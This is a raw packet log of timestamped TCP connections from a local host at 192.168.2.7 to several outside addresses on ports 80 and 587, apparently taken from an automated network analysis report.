                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:55.358092070 CET4990680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:55.384438038 CET4990780192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:55.389367104 CET8049907172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:55.390371084 CET4990780192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:55.390551090 CET4990780192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:55.390551090 CET4990780192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:55.395420074 CET8049907172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:55.395432949 CET8049907172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.047486067 CET8049907172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.047575951 CET4990780192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.051551104 CET4990780192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.052212954 CET804990518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.056360006 CET8049907172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.059870958 CET4990580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.065063953 CET804990518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.065295935 CET4990580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.092642069 CET4991380192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.097686052 CET8049913172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.097812891 CET4991380192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.116128922 CET4991380192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.116128922 CET4991380192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.121151924 CET8049913172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.121185064 CET8049913172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.125983953 CET4991480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.131015062 CET804991454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.131119967 CET4991480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.134116888 CET4991480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.134138107 CET4991480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.139028072 CET804991454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.139043093 CET804991454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.767175913 CET8049913172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.767499924 CET4991380192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.975410938 CET804991454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.034152031 CET4991380192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.035382032 CET4991480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.039124966 CET8049913172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.040693998 CET804991454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.040762901 CET4991480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.133852005 CET4992080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.138828993 CET804992018.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.138917923 CET4992080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.140130997 CET4992080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.140155077 CET4992080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.145180941 CET804992018.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.145211935 CET804992018.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.425523043 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.430500031 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.430560112 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.480004072 CET4992380192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.485050917 CET804992344.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.485135078 CET4992380192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.500550032 CET4992380192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.500576019 CET4992380192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.505570889 CET804992344.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.505593061 CET804992344.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.163077116 CET804992344.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.173356056 CET4992380192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.178742886 CET804992344.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.178917885 CET4992380192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.237843037 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.238058090 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.242983103 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.339117050 CET4992080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.349208117 CET4992980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.356390953 CET804992918.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.356455088 CET4992980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.361669064 CET4992980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.361788988 CET4992980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.367665052 CET804992918.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.367680073 CET804992918.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.481767893 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.481972933 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.487169981 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.726116896 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.726675987 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.731690884 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.807775974 CET4993080192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.812870979 CET8049930172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.812959909 CET4993080192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.832964897 CET4993080192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.832992077 CET4993080192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.838088036 CET8049930172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.838109016 CET8049930172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.977514982 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.977549076 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.977566004 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.977659941 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.018193007 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.023627996 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.262422085 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.274327040 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.279366970 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.473268032 CET8049930172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.475410938 CET4993080192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.517896891 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.529591084 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.534509897 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.768312931 CET4993080192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.772917032 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.773261070 CET8049930172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.774151087 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.779095888 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.818535089 CET804992918.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.833240032 CET4992980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.838792086 CET804992918.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.838851929 CET4992980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.903964043 CET4993680192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.908978939 CET804993682.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.909048080 CET4993680192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.913058996 CET4993680192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.913085938 CET4993680192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.917896032 CET804993682.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.917908907 CET804993682.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.027143955 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.030371904 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.245984077 CET4994180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.246701002 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.246752024 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.246823072 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.250938892 CET8049941172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.251036882 CET4994180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.252940893 CET4994180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.252975941 CET4994180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.257913113 CET8049941172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.257927895 CET8049941172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.485220909 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.485516071 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.490668058 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.734719992 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.736176014 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.741125107 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.910952091 CET8049941172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.912576914 CET4994180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.912668943 CET4994180192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.917808056 CET8049941172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.979240894 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.982167959 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.982212067 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.982239008 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.982261896 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.987170935 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.987211943 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.987222910 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.987235069 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:01.225724936 CET4994780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:01.226630926 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:01.230730057 CET804994718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:01.231143951 CET4994780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:01.297298908 CET4994780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:01.297317028 CET4994780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:01.302483082 CET804994718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:01.302499056 CET804994718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:01.384105921 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.535656929 CET4993680192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.693962097 CET804994718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.743668079 CET4994780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.765856028 CET4994780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.772138119 CET804994718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.772209883 CET4994780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.870348930 CET4995580192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.875319958 CET804995582.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.875849009 CET4995580192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.880629063 CET4995580192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.880681992 CET4995580192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.883090019 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.885504961 CET804995582.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.885515928 CET804995582.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.888068914 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.126460075 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.127367973 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.128508091 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.133421898 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.133728027 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.850908995 CET4996280192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.945317984 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.945445061 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.945667982 CET804996282.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.945755005 CET4996280192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.950227022 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.972387075 CET4996280192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.972403049 CET4996280192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.977359056 CET804996282.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.977375984 CET804996282.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.184408903 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.184552908 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.189461946 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.424139977 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.424608946 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.429647923 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.670398951 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.670437098 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.670533895 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.670670033 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.670685053 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.670881987 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.672367096 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.677288055 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.911711931 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.912791967 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.917712927 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.152132988 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.152967930 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.157944918 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.392589092 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.392949104 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.397900105 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.636971951 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.637170076 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.642215014 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.876893997 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.877126932 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.882008076 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.126171112 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.126386881 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.131335020 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.315167904 CET4995580192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.365643024 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.366034985 CET4997680192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.366914988 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.366998911 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.367027998 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.367069006 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.367124081 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.367167950 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.367201090 CET49956587192.168.2.751.195.88.199
